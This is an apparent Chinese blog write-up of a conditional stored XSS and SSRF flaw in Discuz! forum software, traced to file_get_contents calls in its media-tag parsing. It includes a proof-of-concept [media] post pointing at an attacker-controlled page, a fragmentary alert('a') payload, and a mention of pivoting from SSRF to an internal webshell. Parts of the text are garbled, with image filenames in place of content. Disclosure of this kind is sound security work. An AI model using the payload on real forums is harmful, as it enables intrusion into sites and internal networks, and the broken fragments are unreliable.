discuz!有条件存储型xss和ssrf

文件source\function\function_discuzcode.phpfunction discuzcode 中

跟踪 parsemedia

跟踪 parseflv

 

可以看出多处使用 file_get_contentsurl可控,从而存在ssrf并且结果可以,返回 imgurl=用于

限制:xss需要后台开启广播功能。ssrf需要 允许使用

[media] [flash] 等多媒体代码旧版本好像默认开启,新版默认关闭,不过后来开启的较多。
发贴(注:需工具提交,不然http://tudou.com 被转为http://tudou.com )
[media=0,0]http://127.0.0.1:8080/s.php?[url]http://tudou.com/programs/view/aaaa[/media]
http://127.0.0.1:8080/s.php内容为:
/Article/UploadPic/2016-2/20162322318814.gif’);”>aaalert(‘a’);

2016020309200497[1]
2016020309200699[1]
aaalert(‘a’);
ssrf 可能shell内网 百度某个从SSRF到内网WebShell之2
解决方案:
过滤

发表评论

要发表评论,您必须先登录